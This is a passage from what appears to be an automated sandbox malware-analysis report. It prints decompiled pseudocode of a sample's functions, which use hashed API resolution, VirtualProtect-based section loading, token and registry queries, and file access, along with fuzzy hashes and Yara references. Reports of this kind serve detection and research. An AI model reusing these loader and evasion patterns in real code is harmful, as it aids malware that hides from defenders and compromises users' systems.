				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0xd54418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
				_v124 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
				_t155 = DisableThreadLibraryCalls(??);
				_t272 = _t271 - 4;
				_t229 =  *_v104;
				_v156 = _t155;
				_v116 = _t229;
				_v120 = _v72;
				if(_t229 != 0) {
					_v120 = _v72 + (_v116 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t240 = _v48;
				_v44 =  *((intOrPtr*)(_t240 + 0x20));
				_v40 =  *((intOrPtr*)(_t240 + 0x18));
				_v36 =  *((intOrPtr*)(_t240 + 0x34));
				_v32 =  *((intOrPtr*)(_t240 + 0x30));
				_v28 =  *_t240;
				_v24 = _v124;
				 *_t272 = _t240;
				_v184 = 0;
				_v180 = 0x74;
				_v128 =  *((intOrPtr*)(_v120 + 0x28));
				_v132 = 0;
				_v136 = 0x74;
				_v140 =  &_v44;
				E00D52569();
				if(_v128 != 0) {
					_t272 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x00d5221f
0x00d5222d
0x00d52234
0x00d52237
0x00d52241
0x00d52248
0x00d52252
0x00d52258
0x00d52261
0x00d5226a
0x00d5226d
0x00d52273
0x00d52277
0x00d5227f
0x00d52283
0x00d52286
0x00d52289
0x00d5228c
0x00d5228f
0x00d522a9
0x00d522af
0x00d522b2
0x00d522ba
0x00d522be
0x00d522c1
0x00d522c4
0x00d522c7
0x00d522ca
0x00d522e6
0x00d52303
0x00d52328
0x00d5232a
0x00d52333
0x00d52336
0x00d52340
0x00d52343
0x00d52346
0x00d52349
0x00d5234c
0x00d523a4
0x00d523a4
0x00d5254a
0x00d52550
0x00d5244d
0x00d52453
0x00d5249f
0x00d5249f
0x00d524bc
0x00d524e2
0x00d524f0
0x00d524f3
0x00d524f7
0x00d524fb
0x00d52502
0x00d52508
0x00d5250a
0x00d5251c
0x00d52524
0x00d5252a
0x00d52530
0x00d52536
0x00000000
0x00000000
0x00d5253c
0x00d5249f
0x00d5245b
0x00d52469
0x00d52471
0x00d52474
0x00d52476
0x00d5247c
0x00d52488
0x00d5248e
0x00d52491
0x00d52494
0x00d5238a
0x00d5238a
0x00d523d8
0x00d523de
0x00d523e4
0x00d523ea
0x00d523f0
0x00d523f5
0x00d523fb
0x00d523fe
0x00d52401
0x00d52409
0x00d52411
0x00d52414
0x00d52417
0x00d5241d
0x00d52423
0x00d5242e
0x00d52362
0x00d52368
0x00d52368
0x00d523c5

APIs

VirtualProtect.KERNELBASE ref: 00D5228F
VirtualProtect.KERNELBASE ref: 00D52328

Strings

t, xrefs: 00D52409

Memory Dump Source

Source File: 00000002.00000002.492341023.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: t
API String ID: 544645111-2238339752
Opcode ID: 2e782fe078c70119b019604d4b061d8c5b0f830d65e2b83046c2d14a733e7da8
Instruction ID: c4ae8de267f62b154e15f4a55ceedbdead1414f524b6f2e70331377a3cb1ecef
Opcode Fuzzy Hash: 2e782fe078c70119b019604d4b061d8c5b0f830d65e2b83046c2d14a733e7da8
Instruction Fuzzy Hash: F88189B4E042088FDB04DF99C580AADFBF1BF48310F65856AE958AB361D734A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E891140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6E891140(void* __ecx, void* __edi, void* __esi) {
				long _v12;
				void* _v20;
				void* _v24;
				char _v32;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v64;
				int _t31;
				void* _t33;
				long* _t39;
				intOrPtr* _t46;
				void* _t54;
				void* _t56;
				void* _t58;
				long* _t59;

				_t59 = _t58 - 0x20;
				_t56 = __ecx;
				_v12 = 0;
				_t46 = E6E892F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t46 != 0) {
					 *_t46(_t56, 8,  &_v12);
				}
				_t39 = _t59;
				 *_t39 = _v12;
				_t39[1] = 1;
				if(E6E88C33C(_t39) != 0) {
					L6:
					if(_t59[1] != 0) {
						E6E88BC00(_t59);
					}
					return 0;
				} else {
					_t59[6] = 0;
					if(E6E892F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t59[6])); // executed
					}
					_t24 = _t59[6];
					if(_t59[6] != 0) {
						E6E88F620( &_v32, _t24);
						_t54 = E6E88F558( &(_t59[3]), 0);
						if(E6E892F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
							L13:
							E6E88F6F0( &_v32);
							goto L6;
						} else {
							_t31 = GetTokenInformation(_v40, 0x19, _t54, _t59[7],  &(_t59[6])); // executed
							if(_t31 == 0) {
								goto L13;
							} else {
								_t33 = E6E892F94(0xd0443458, 0x57bf3274, 0xd0443458, 0xd0443458);
								if(_t33 == 0) {
									goto L13;
								} else {
									_push( *_t54);
									asm("int3");
									return _t33;
								}
							}
						}
					} else {
						goto L6;
					}
				}
			}

0x6e891142
0x6e89114f
0x6e891151
0x6e891160
0x6e891164
0x6e89116e
0x6e89116e
0x6e891174
0x6e891177
0x6e891179
0x6e891184
0x6e8911be
0x6e8911c3
0x6e8911c8
0x6e8911c8
0x6e8911d4
0x6e891186
0x6e891190
0x6e8911a3
0x6e8911b4
0x6e8911b4
0x6e8911b6
0x6e8911bc
0x6e8911da
0x6e8911ea
0x6e891201
0x6e8912e3
0x6e8912e7
0x00000000
0x6e891207
0x6e891217
0x6e89121b
0x00000000
0x6e891221
0x6e89122d
0x6e891234
0x00000000
0x6e89123a
0x6e89123a
0x6e89123c
0x6e89123d
0x6e89123d
0x6e891234
0x6e89121b
0x00000000
0x00000000
0x00000000
0x6e8911bc

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 6E8911B4
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 6E891217

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction ID: dd22193b20a6cd877fe966a5b66aadc685eecf275bfaf280f19a2f5c80086978
Opcode Fuzzy Hash: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction Fuzzy Hash: 52219A70A082067FFB05DAAC9C10FAB66EDAFD1204F208C28B454C7295EF34C80A9761

Uniqueness

Uniqueness Score: -1.00%

Function 6E895720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E895720(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E892F8C(0xd0443458, 0x91134e46) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E88F8C4(_a8, _t15);
							if(E6E892F8C(0xd0443458, 0x91134e46) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E88F558(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6e895724
0x6e895725
0x6e895727
0x6e89572c
0x6e895733
0x6e895737
0x6e895737
0x6e895737
0x6e89573b
0x6e895781
0x6e895781
0x6e89573d
0x6e89573d
0x6e895743
0x6e89574c
0x6e89574f
0x6e895766
0x6e895777
0x6e895777
0x6e895779
0x6e89577f
0x6e89578a
0x6e8957a2
0x6e8957c2
0x6e8957c2
0x6e8957c4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e895743
0x6e8957cc

APIs

RegQueryValueExA.KERNELBASE(?,6E89D1F8,00000000,?,00000000,00000000,?,?,?,6E89D1F8,?,6E8957F3,?,00000000,00000000), ref: 6E895777
RegQueryValueExA.KERNELBASE(?,6E89D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E89D1F8,?,6E8957F3,?,00000000), ref: 6E8957C2

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction ID: d8ff22b7e241ded2d9d32003fffd4d72ad96852316bc221e6c2dd929a494557e
Opcode Fuzzy Hash: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction Fuzzy Hash: F311B171A0D30AFFE6519FADDC90EABB7ECEF81759F004C1DB59897180DA20E900A671

Uniqueness

Uniqueness Score: -1.00%

Function 6E895AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6E895AA8(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t29;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t56;
				WCHAR** _t58;
				char* _t64;
				void* _t65;
				long _t66;

				_push(0);
				_push(_t62);
				_t66 = _t65 - 0x10;
				_t58 = __ecx;
				_t37 = _a8;
				if(E6E88D288(__ecx, 0x2f) != 0) {
					_t62 = _t66;
					E6E88D78C(__ecx, _t66);
					E6E88D0B4(_t58,  *_t66);
					E6E88D098(_t66);
				}
				if(_t37 == 0) {
					_t70 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E89621C(_t70);
				if(_a4 <= 5) {
					goto __eax;
				}
				_t62 = 0;
				if(_t37 != 2) {
					_t16 = 3;
					__eflags = _t37 - 1;
					_t38 = 0;
					_t39 =  ==  ? _t16 : _t38;
				} else {
					_t39 = 1;
				}
				if(E6E892F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t29 = CreateFileW( *_t58, 0, _t39, 0, _t62, _a12, 0); // executed
					_push(_t29);
				}
				_t40 =  &(_t58[3]);
				E6E88C328(_t40);
				if(E6E88C33C(_t40) != 0) {
					_t58[2] = E6E89352C(0);
					_t21 = 0;
					goto L19;
				} else {
					if(_a4 == 2) {
						_t56 = E6E892F8C(0x4bcc7cba, 0xceed09cc);
						__eflags = _t56;
						if(_t56 != 0) {
							 *_t56( *_t40, 0, 0, 2);
						}
					}
					_t64 =  &_v24;
					E6E8935D4(_t64, 0xff, 8);
					_t66 = _t66 + 0xc;
					_t24 = E6E892F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t24 == 0) {
						_t21 = 1;
						__eflags = 1;
						L19:
						return _t21;
					} else {
						_push(_t64);
						_push(_t64);
						_push(0);
						_push( *_t40);
						asm("int3");
						return _t24;
					}
				}
			}

0x6e895aa8
0x6e895aab
0x6e895aac
0x6e895aaf
0x6e895ab1
0x6e895abe
0x6e895ac2
0x6e895ac6
0x6e895ad0
0x6e895ad7
0x6e895ad7
0x6e895ade
0x6e895ae0
0x6e895ae5
0x6e895aee
0x6e895af6
0x6e895af6
0x6e895ae7
0x6e895ae9
0x6e895ae9
0x6e895ae5
0x6e895afb
0x6e895b07
0x6e895b1d
0x6e895b1d
0x6e895c38
0x6e895b75
0x6e895b7e
0x6e895b7f
0x6e895b84
0x6e895b85
0x6e895b77
0x6e895b79
0x6e895b79
0x6e895b9b
0x6e895baf
0x6e895b9d
0x6e895baa
0x6e895bac
0x6e895bac
0x6e895bb1
0x6e895bb6
0x6e895bc4
0x6e895c2f
0x6e895c32
0x00000000
0x6e895bc6
0x6e895bcb
0x6e895c18
0x6e895c1a
0x6e895c1c
0x6e895c26
0x6e895c26
0x6e895c1c
0x6e895bcd
0x6e895bd9
0x6e895bde
0x6e895beb
0x6e895bf2
0x6e895bfe
0x6e895bfe
0x6e895bff
0x6e895c06
0x6e895bf4
0x6e895bf4
0x6e895bf5
0x6e895bf6
0x6e895bf8
0x6e895bfa
0x6e895bfb
0x6e895bfb
0x6e895bf2

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536f03c963c2ec59aaf10f73ca25b348c5ef656c70e86d854fc413e3e7029c1f
Instruction ID: ceb524655318cf61e490c299c4a6f2b5d9525d0e500ba46710716653aab15e78
Opcode Fuzzy Hash: 536f03c963c2ec59aaf10f73ca25b348c5ef656c70e86d854fc413e3e7029c1f
Instruction Fuzzy Hash: C631F530B8430AAFE7506BFD8C94F6F76DDEB8220AF004C29F9559A0C5DB618904A635

Uniqueness

Uniqueness Score: -1.00%

Function 00D52439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00D52508

Memory Dump Source

Source File: 00000002.00000002.492341023.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c745704349122442a37f3f7b60ac1bc4669079f1df3c9ea69f17e74adbcd83e4
Instruction ID: e1c5c558c8bf2d0af47cd53448e1871e6e98cf5371da81dfe9ccb2a6adf03b73
Opcode Fuzzy Hash: c745704349122442a37f3f7b60ac1bc4669079f1df3c9ea69f17e74adbcd83e4
Instruction Fuzzy Hash: 4631E8B5E002288FDB14CF68C98069DB7F1BF99300F658299D94CA7346D731AE85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E895B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E6E895B29(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E892F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E88C328(_t24);
				if(E6E88C33C(_t24) != 0) {
					_t34[2] = E6E89352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E892F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E8935D4(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					_t15 = E6E892F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x6e895b29
0x6e895b2d
0x6e895b30
0x6e895b33
0x6e895b75
0x6e895b7e
0x6e895b84
0x6e895b85
0x6e895b77
0x6e895b79
0x6e895b79
0x6e895b9b
0x6e895baf
0x6e895b9d
0x6e895baa
0x6e895bac
0x6e895bac
0x6e895bb1
0x6e895bb6
0x6e895bc4
0x6e895c2f
0x6e895c32
0x00000000
0x6e895bc6
0x6e895bcb
0x6e895c18
0x6e895c1c
0x6e895c26
0x6e895c26
0x6e895c1c
0x6e895bcd
0x6e895bd9
0x6e895bde
0x6e895beb
0x6e895bf2
0x6e895bfe
0x6e895bff
0x6e895c06
0x6e895bf4
0x6e895bf4
0x6e895bf5
0x6e895bf6
0x6e895bf8
0x6e895bfa
0x6e895bfb
0x6e895bfb
0x6e895bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 6E895BAA

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction ID: 5ffcd39995fc3861574f9271dd6b7fdf1acfbd2df212cff4748808bce9fda3a7
Opcode Fuzzy Hash: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction Fuzzy Hash: 2101DF20B8030BBFEB6017ED9C41F7B769DEBC374AF004C68B951660C6DB518804A231

Uniqueness

Uniqueness Score: -1.00%

Function 6E895B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E6E895B3D(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E892F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E88C328(_t24);
				if(E6E88C33C(_t24) != 0) {
					_t34[2] = E6E89352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6E892F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6E8935D4(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					_t15 = E6E892F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x6e895b3d
0x6e895b44
0x6e895b47
0x6e895b75
0x6e895b7e
0x6e895b84
0x6e895b85
0x6e895b77
0x6e895b79
0x6e895b79
0x6e895b9b
0x6e895baf
0x6e895b9d
0x6e895baa
0x6e895bac
0x6e895bac
0x6e895bb1
0x6e895bb6
0x6e895bc4
0x6e895c2f
0x6e895c32
0x00000000
0x6e895bc6
0x6e895bcb
0x6e895c18
0x6e895c1c
0x6e895c26
0x6e895c26
0x6e895c1c
0x6e895bcd
0x6e895bd9
0x6e895bde
0x6e895beb
0x6e895bf2
0x6e895bfe
0x6e895bff
0x6e895c06
0x6e895bf4
0x6e895bf4
0x6e895bf5
0x6e895bf6
0x6e895bf8
0x6e895bfa
0x6e895bfb
0x6e895bfb
0x6e895bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 6E895BAA

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction ID: 8ef44968281e447f8b85f2b8a8fa8b312fc759c782245910374a74c91132a99a
Opcode Fuzzy Hash: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction Fuzzy Hash: A2012B20B803077FEB5057ED8C81F7F765EDB8334AF004C65B951660C6DF618804A231

Uniqueness

Uniqueness Score: -1.00%

Function 6E895B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E6E895B1F(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E892F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E88C328(_t23);
				if(E6E88C33C(_t23) != 0) {
					_t31[2] = E6E89352C(0x100);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E892F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E8935D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E6E892F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x6e895b1f
0x6e895b26
0x6e895b75
0x6e895b7e
0x6e895b84
0x6e895b85
0x6e895b77
0x6e895b79
0x6e895b79
0x6e895b9b
0x6e895baf
0x6e895b9d
0x6e895baa
0x6e895bac
0x6e895bac
0x6e895bb1
0x6e895bb6
0x6e895bc4
0x6e895c2f
0x6e895c32
0x00000000
0x6e895bc6
0x6e895bcb
0x6e895c18
0x6e895c1c
0x6e895c26
0x6e895c26
0x6e895c1c
0x6e895bcd
0x6e895bd9
0x6e895bde
0x6e895beb
0x6e895bf2
0x6e895bfe
0x6e895bff
0x6e895c06
0x6e895bf4
0x6e895bf4
0x6e895bf5
0x6e895bf6
0x6e895bf8
0x6e895bfa
0x6e895bfb
0x6e895bfb
0x6e895bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 6E895BAA

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction ID: 8b799de64e03a5f601a6995e64d413f8c069ddc5f924d4b26494e43c9cabf01e
Opcode Fuzzy Hash: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction Fuzzy Hash: CD01D130B8030BBFEB6057ED8C91F6B765DEB9274AF000C68B991664C5DF619814A231

Uniqueness

Uniqueness Score: -1.00%

Function 6E895B68, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E6E895B68(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* __esi;
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t33;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E892F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, _t33, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E88C328(_t23);
				if(E6E88C33C(_t23) != 0) {
					_t31[2] = E6E89352C(_t33);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E892F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E8935D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E6E892F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x6e895b68
0x6e895b6a
0x6e895b75
0x6e895b7e
0x6e895b84
0x6e895b85
0x6e895b77
0x6e895b79
0x6e895b79
0x6e895b9b
0x6e895baf
0x6e895b9d
0x6e895baa
0x6e895bac
0x6e895bac
0x6e895bb1
0x6e895bb6
0x6e895bc4
0x6e895c2f
0x6e895c32
0x00000000
0x6e895bc6
0x6e895bcb
0x6e895c18
0x6e895c1c
0x6e895c26
0x6e895c26
0x6e895c1c
0x6e895bcd
0x6e895bd9
0x6e895bde
0x6e895beb
0x6e895bf2
0x6e895bfe
0x6e895bff
0x6e895c06
0x6e895bf4
0x6e895bf4
0x6e895bf5
0x6e895bf6
0x6e895bf8
0x6e895bfa
0x6e895bfb
0x6e895bfb
0x6e895bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 6E895BAA

Memory Dump Source

